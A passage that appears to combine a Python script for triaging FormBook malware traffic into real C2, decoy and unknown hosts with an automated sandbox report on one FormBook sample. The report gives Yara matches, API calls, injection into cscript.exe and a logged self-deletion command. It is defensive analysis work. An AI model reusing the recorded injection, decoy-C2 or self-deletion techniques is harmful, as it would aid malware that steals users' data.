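    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def parse_query(query: str) -> dict:
    """Split a query string without decoding: the 4hoDb blob is base64-like and
    contains '+' and '/', which urllib's parse_qs would turn into spaces."""
    pairs = (p.partition("=") for p in query.split("&") if p)
    return {k: v for k, _, v in pairs}


def bare_host(host: str) -> str:
    """Drop a port and a leading 'www.' so config entries and Host headers compare."""
    host = host.split(":")[0].lower()
    return host[4:] if host.startswith("www.") else host


def classify_host(host: str, target: str, config: dict) -> str:
    """Return 'c2', 'decoy' or 'unknown' for one Host header and request target.
    The C2 entry is host plus directory, the decoys are bare domains."""
    uri_dir = urlsplit(target).path
    for entry in config["C2 list"]:
        c2_host, _, c2_dir = entry.partition("/")
        if bare_host(host) == bare_host(c2_host) and uri_dir == "/" + c2_dir:
            return "c2"
    if bare_host(host) in {d.lower() for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def summarize(raw_requests: list, config: dict) -> dict:
    """Group requests by class, count missing User-Agent headers, and keep the
    URI directories and the query parameters identical in every request."""
    out = {"c2": [], "decoy": [], "unknown": [], "no_user_agent": 0,
           "uri_dirs": set(), "constant_params": None}
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        out[classify_host(host, req["target"], config)].append(host)
        if "user-agent" not in req["headers"]:
            out["no_user_agent"] += 1
        parts = urlsplit(req["target"])
        out["uri_dirs"].add(parts.path)
        params = parse_query(parts.query)
        if out["constant_params"] is None:
            out["constant_params"] = dict(params)
        else:
            out["constant_params"] = {k: v for k, v in out["constant_params"].items()
                                      if params.get(k) == v}
    return out


if __name__ == "__main__":
    s = summarize(RAW_REQUESTS, CONFIG)
    print(f"real C2 contacted: {s['c2'] or 'none'}; decoys: {len(s['decoy'])}; "
          f"unknown: {s['unknown'] or 'none'}; no User-Agent: {s['no_user_agent']}")
    print(f"URI directories: {sorted(s['uri_dirs'])}; constant params: {s['constant_params']}")
```

The same shape works on a proxy log or a PCAP export of other runs: a request whose Host falls in neither list is worth a second look, and the constant query parameter plus the directory are the values to pivot on when hunting for sibling samples of the same campaign.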

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02788280 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02788300 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_027883B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_027881D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02788222 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_027883AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_0040102E
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_0041B8FB
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00408C6C
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00408C70
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_0041B57A
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00402D88
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_0041C58A
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_00402D90
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0478841F
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04831002
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0478B090
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04770D20
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04794120
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0477F900
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0478D5E0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04841D55
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_04796E30
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_047AEBB0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0278B8FB
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02772FB0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02778C70
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02778C6C
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0278B57A
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02772D90
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_0278C58A
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 9_2_02772D88
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 0477B150 appears 32 times
          Source: 85vLO1Rpcy.exe, 00000001.00000003.655654489.000000000239F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 85vLO1Rpcy.exe
          Source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs 85vLO1Rpcy.exe
          Source: 85vLO1Rpcy.exe, 00000002.00000002.718870614.0000000000C0F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 85vLO1Rpcy.exe
          Source: 85vLO1Rpcy.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/0@12/8
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_01
          Source: 85vLO1Rpcy.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: 85vLO1Rpcy.exe | ReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | File read: C:\Users\user\Desktop\85vLO1Rpcy.exe
          Source: unknown | Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: Binary string: cscript.pdbUGP source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 85vLO1Rpcy.exe, 00000001.00000003.654242589.00000000020F0000.00000004.00000001.sdmp, 85vLO1Rpcy.exe, 00000002.00000002.718159413.0000000000960000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.917910463.000000000486F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 85vLO1Rpcy.exe, cscript.exe
          Source: Binary string: cscript.pdb source: 85vLO1Rpcy.exe, 00000002.00000002.719059320.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.706368480.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Unpacked PE file: 2.2.85vLO1Rpcy.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_004062F6 pushfd ; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_004153FC push eax; retf
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\85vLO1Rpcy.exe | Code function: 2_2_0041B412 push eax; ret
